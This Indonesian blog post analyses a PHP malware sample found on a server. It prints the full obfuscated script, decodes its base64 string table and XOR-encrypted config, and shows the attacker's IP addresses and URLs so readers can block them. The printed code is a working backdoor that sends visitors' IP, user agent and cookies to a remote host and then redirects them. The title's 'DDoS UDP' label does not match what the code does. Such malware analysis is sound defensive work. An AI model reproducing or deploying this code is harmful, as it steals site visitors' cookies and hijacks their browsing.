jump to navigation

decoding malware ddos UDP paket
October 27, 2017

Posted by cu.admin in : Linux , trackback

contoh skrip malware yang ada di server

<blockquote>
&amp;lt;? function _1246590434($i){$a=Array('S1liWjR2Yw==','aDRI','','SCo=','bW9kZQ==','Y29uZmln','a2V5','a2V5','PGZvcm0gbmFtZT0iZm9ybTEiIG1ldGhvZD0icG9zdCIgYWN0aW9uPT9tb2RlPXNldGNvbmZpZyZrZXk9','a2V5','PjxwcmU+ClREUzogICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzIiB2YWx1ZT0i','dXJs','Ij4gIFREUyBJUDogIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzaXAiIHZhbHVlPSI=','aXA=','Ij4KS0VZOiAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBrZXkiIHZhbHVlPSI=','a2V5','Ij4gIFJlc2VydmU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdG8iIHZhbHVlPSI=','bGlu','Ij4KSUQ6ICAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBlc2RpZCIgdmFsdWU9Ig==','aWQ=','Ij4gIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IlN1Ym1pdCIgdmFsdWU9Im9rIj48L3ByZT4KPC9mb3JtPg==','c2V0Y29uZmln','a2V5','a2V5','Lw==','U0NSSVBUX05BTUU=','dXJs','cHRkcw==','aXA=','cHRkc2lw','bGlu','cHRv','aWQ=','cGVzZGlk','a2V5','cGtleQ==','YWNjX2lk','YWNjX2lk','dw==','','U2F2ZWQuCg==','a2lsbA==','a2V5','a2V5','Nzc3','U0NSSVBUX0ZJTEVOQU1F','U0NSSVBUX0ZJTEVOQU1F','b2sK','Lw==','dXJs','aXA=','aXA=','YWNjX2lk','YWNjX2lk','aHR0cDovLw==','SFRUUF9IT1NU','U0NSSVBUX05BTUU=','SFRUUF9SRUZFUkVS','UkVNT1RFX0FERFI=','bm8=','SFRUUF9YX0ZPUldBUkRFRF9GT1I=','eWVz','SFRUUF9VU0VSX0FHRU5U','aWQ=','aWQ=','a2V5','Jg==','a2V5','PQ==','UVVFUllfU1RSSU5H','R0VUIA==','dXJs','P2RvbT0=','JnJlZj0=','JmlwPQ==','JnByb3g9','JmFnZW50PQ==','JmNvb2tpZT0=','JmVzZGlkPQ==','aWQ=','JmZyYW1laWQ9','JmFjY19pZD0=','IEhUVFAvMS4wDQo=','SG9zdDog','DQo=','Q29ubmVjdGlvbjogQ2xvc2UNCg0K','DQo=','ZG8=','ZG8=','IA==','bGlu','MjAw','bGlu','Oi8v','aHR0cA==','SFRUUC8xLjEgMzAyIEZvdW5k','TG9jYXRpb246IA==','Y29vaw==','Jg==','PQ==','ZWNobw==');return<span id="more-14460"></span> base64_decode($a[$i]);} ?&amp;gt;&lt;!--?php error_reporting(0);$key=_1246590434(0);function string_cpt($String,$Password){$Salt=_1246590434(1);$StrLen=strlen($String);$Seq=$Password;$Gamma=_1246590434(2);while(strlen($Gamma)&amp;lt;$StrLen){$Seq=pack(_1246590434(3),sha1($Gamma .$Seq .$Salt));$Gamma .= substr($Seq,0,8);}return $String^$Gamma;}$c=unserialize(string_cpt(base64_decode($cfg),$key));$mode=$_REQUEST[_1246590434(4)];if($mode == _1246590434(5)AND $c[_1246590434(6)]== $_REQUEST[_1246590434(7)]){echo _1246590434(8) .$_REQUEST[_1246590434(9)] ._1246590434(10) .$c[_1246590434(11)] ._1246590434(12) .$c[_1246590434(13)] ._1246590434(14) .$c[_1246590434(15)] ._1246590434(16) .$c[_1246590434(17)] ._1246590434(18) .$c[_1246590434(19)] ._1246590434(20);die();}if($mode == _1246590434(21)AND $c[_1246590434(22)]== $_REQUEST[_1246590434(23)]){$sn=explode(_1246590434(24),$_SERVER[_1246590434(25)]);foreach($sn as $snn){$scr=$snn;}$getlpa=file($scr);$strng=$getlpa[0];$file=file($scr);for($i=0;$i&amp;lt;sizeof($file);$i++){if($i == 0){$c[_1246590434(26)]=$_POST[_1246590434(27)];$c[_1246590434(28)]=$_POST[_1246590434(29)];$c[_1246590434(30)]=$_POST[_1246590434(31)];$c[_1246590434(32)]=$_POST[_1246590434(33)];$c[_1246590434(34)]=$_POST[_1246590434(35)];$c[_1246590434(36)]=$_POST[_1246590434(37)];$cfg=base64_encode(string_cpt(serialize($c),$key));$file[$i]=&quot;&amp;lt;?\$cfg='$cfg'; ?--&gt;\n&quot;;}}$fp=fopen($scr,_1246590434(38));if(fputs($fp,implode(_1246590434(39),$file))){die(_1246590434(40));}fclose($fp);}if($mode == _1246590434(41)AND $c[_1246590434(42)]== $_REQUEST[_1246590434(43)]){chmod(_1246590434(44),$_SERVER[_1246590434(45)]);if(unlink($_SERVER[_1246590434(46)])){die(_1246590434(47));}}$dom=explode(_1246590434(48),$c[_1246590434(49)]);$dom=$dom[2];$dhost=$dom;if($c[_1246590434(50)]){$dom=$c[_1246590434(51)];}if($c[_1246590434(52)]){$acc_id=$c[_1246590434(53)];}$fp=fsockopen($dom,80,$errno,$errstr,2);if(!$fp){$res=1;}else{$t_dom=urlencode(_1246590434(54) .$_SERVER[_1246590434(55)] .$_SERVER[_1246590434(56)]);$t_ref=urlencode($_SERVER[_1246590434(57)]);$t_ip=urlencode($_SERVER[_1246590434(58)]);$t_prox=_1246590434(59);if($_SERVER[_1246590434(60)]){$t_prox=_1246590434(61);}$t_agent=urlencode($_SERVER[_1246590434(62)]);if(isset($_GET[_1246590434(63)])){$t_frameid=urlencode($_GET[_1246590434(64)]);}foreach($_COOKIE as $c[_1246590434(65)]=&amp;gt; $val){$t_cookie=$t_cookie ._1246590434(66) .$c[_1246590434(67)] ._1246590434(68) .$val;}$t_cookie=urlencode($t_cookie);if(empty($t_cookie)){$t_cookie=urlencode($_SERVER[_1246590434(69)]);}$out=_1246590434(70) .$c[_1246590434(71)] ._1246590434(72) .$t_dom ._1246590434(73) .$t_ref ._1246590434(74) .$t_ip ._1246590434(75) .$t_prox ._1246590434(76) .$t_agent ._1246590434(77) .$t_cookie ._1246590434(78) .$c[_1246590434(79)];if(isset($t_frameid)){$out .= _1246590434(80) .$t_frameid;}if(isset($acc_id)){$out .= _1246590434(81) .$acc_id;}$out .= _1246590434(82);$out .= _1246590434(83) .$dhost ._1246590434(84);$out .= _1246590434(85);fwrite($fp,$out);while(!feof($fp)){$str=fgets($fp,128);$ch .= $str;if($str == _1246590434(86)&amp;amp;&amp;amp; empty($he)){$he=_1246590434(87);}if($he == _1246590434(88)){$goto .= $str;}}fclose($fp);}$goto=substr($goto,2);$ch=explode(_1246590434(89),$ch);if($res){$goto=$c[_1246590434(90)];}if($ch[1]== _1246590434(91)){}else{$goto=$c[_1246590434(92)];}$gotoe=explode(_1246590434(93),$goto);If($gotoe[0]== _1246590434(94)){header(_1246590434(95));header(_1246590434(96) .$goto);}$goto_body=substr($goto,7);If($gotoe[0]== _1246590434(97)){$gotoee=explode(_1246590434(98),$goto_body);foreach($gotoee as $setcook){$set=explode(_1246590434(99),$setcook);setcookie($set[0],$set[1]);}}If($gotoe[0]== _1246590434(100)){echo $goto_body;} 

==setelah kita encode akan terlihat hasilnya==
/*

?
$a=Array('S1liWjR2Yw==','aDRI','','SCo=','bW9kZQ==','Y29uZmln','a2V5','a2V5','PGZvcm0gbmFtZT0iZm9ybTEiIG1ldGhvZD0icG9zdCIgYWN0aW9uPT9tb2RlPXNldGNvbmZpZyZrZXk9','a2V5','PjxwcmU+ClREUzogICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzIiB2YWx1ZT0i','dXJs','Ij4gIFREUyBJUDogIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzaXAiIHZhbHVlPSI=','aXA=','Ij4KS0VZOiAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBrZXkiIHZhbHVlPSI=','a2V5','Ij4gIFJlc2VydmU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdG8iIHZhbHVlPSI=','bGlu','Ij4KSUQ6ICAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBlc2RpZCIgdmFsdWU9Ig==','aWQ=','Ij4gIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IlN1Ym1pdCIgdmFsdWU9Im9rIj48L3ByZT4KPC9mb3JtPg==','c2V0Y29uZmln','a2V5','a2V5','Lw==','U0NSSVBUX05BTUU=','dXJs','cHRkcw==','aXA=','cHRkc2lw','bGlu','cHRv','aWQ=','cGVzZGlk','a2V5','cGtleQ==','YWNjX2lk','YWNjX2lk','dw==','','U2F2ZWQuCg==','a2lsbA==','a2V5','a2V5','Nzc3','U0NSSVBUX0ZJTEVOQU1F','U0NSSVBUX0ZJTEVOQU1F','b2sK','Lw==','dXJs','aXA=','aXA=','YWNjX2lk','YWNjX2lk','aHR0cDovLw==','SFRUUF9IT1NU','U0NSSVBUX05BTUU=','SFRUUF9SRUZFUkVS','UkVNT1RFX0FERFI=','bm8=','SFRUUF9YX0ZPUldBUkRFRF9GT1I=','eWVz','SFRUUF9VU0VSX0FHRU5U','aWQ=','aWQ=','a2V5','Jg==','a2V5','PQ==','UVVFUllfU1RSSU5H','R0VUIA==','dXJs','P2RvbT0=','JnJlZj0=','JmlwPQ==','JnByb3g9','JmFnZW50PQ==','JmNvb2tpZT0=','JmVzZGlkPQ==','aWQ=','JmZyYW1laWQ9','JmFjY19pZD0=','IEhUVFAvMS4wDQo=','SG9zdDog','DQo=','Q29ubmVjdGlvbjogQ2xvc2UNCg0K','DQo=','ZG8=','ZG8=','IA==','bGlu','MjAw','bGlu','Oi8v','aHR0cA==','SFRUUC8xLjEgMzAyIEZvdW5k','TG9jYXRpb246IA==','Y29vaw==','Jg==','PQ==','ZWNobw==');

for ($x=0; $x&lt;=200; $x++)
{
echo " ";echo "'"; echo "$x:";echo base64_decode($a[$x]);
}
//'KYbZ4vc 'h4H ' key 0 dan 1 adalah key dan Salt yang digunakan untuk membaca CFG variabel

langsung aja yah setelah dilakukan encode, hasilnya seperti ini kita hanya butuh password dan keynya untuk membaca variabel cfg nya

?
 
$cfg = 'UjL0xWPyXdB773KutcRiubsC78avF2CeLWQfgThnKO2T5G+BXwUL0orAd9t2qSb0yl2bQs+itHdLwa0RwBtp70/UZGShmAHANv4N2hyWxim41AeToMQkm5NejMmCNjQIGY9Pz7ktedFKVuqPFjXsXwkOfsuCuzAM01XsmfWA0Iquq4ZZPzvOr7Aug
r6Us2T1DRhBQg0h9wL0RTUAFHQHSoCsFFTIYFWLdwTWdVKzvfhotl1vC6VSgc71o6TR5ZlSaKYDYLv5sPubgpXiGkIr60zBa+FVZDp6TsZatqV8Eko9pSpDHQGbSvn97w=='; 
 
$key = 'KYbZ4vc'; 
function string_cpt($String, $Password) { 
    $Salt = 'h4H'; 
    $StrLen = strlen($String); 
    $Seq = $Password; 
    $Gamma = ''; 
    while (strlen($Gamma) &lt; $StrLen) { 
        $Seq = pack('H*', sha1($Gamma . $Seq . $Salt)); 
        $Gamma.= substr($Seq, 0, 8); 
    } 
    return $String ^ $Gamma; 
} 
$c = string_cpt(base64_decode($cfg), $key); 
print "$c"; 
 
?

Hasilnya:

a:6:{s:3:"url";s:37:"http://185.104.9.3/xxbsds/jomerkx.php";s:2:"ip";s:11:"185.104.9.3";s:3:"lin";s:38:"http://93.170.13.88/xxbsds/jomerkx.php";s:2:"id";s:6:"475187";s:3:"key";s:22:"W5lO5Ga5p4zgp1anHqgMp2";s:6:"acc_id";s:8:"part11_m";}

ip2 diatas adalah tempat malware berada, bisa anda block ip tersebut dari router anda.

thanks

© http://carauntuk.com/decoding-malware-ddos-udp-paket

Sponsor 2

Comments»

no comments yet - be the first?